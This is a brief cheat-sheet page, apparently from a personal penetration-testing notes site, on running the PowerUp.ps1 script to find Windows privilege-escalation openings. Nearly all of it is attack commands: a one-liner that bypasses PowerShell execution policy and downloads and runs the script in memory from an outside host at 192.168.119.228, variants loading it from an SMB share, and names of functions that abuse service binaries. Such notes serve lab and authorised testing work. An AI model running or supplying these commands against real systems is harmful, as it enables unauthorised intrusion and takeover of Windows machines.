>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / PowerUp.ps1 - Windows PrivEsc Checks

PowerUp.ps1 - Windows PrivEsc Checks

Privilege Escalation Windows Tools windows

In-memory load and run

powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.228/PowerUp.ps1');Invoke-AllChecks

From an SMB share

powershell -ep bypass . \\TSCLIENT\share\PowerUp.ps1;Invoke-AllChecks

Local invocation

powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
Invoke-AllChecks > up.log
Get-Help Invoke-ServiceAbuse -Examples

From cmd, save output

powershell -nop -ep bypass . .\PowerUp.ps1;Invoke-AllChecks > up.log

Useful functions

Get-ModifiableServiceFile
Get-UnquotedService
Install-ServiceBinary
Write-ServiceBinary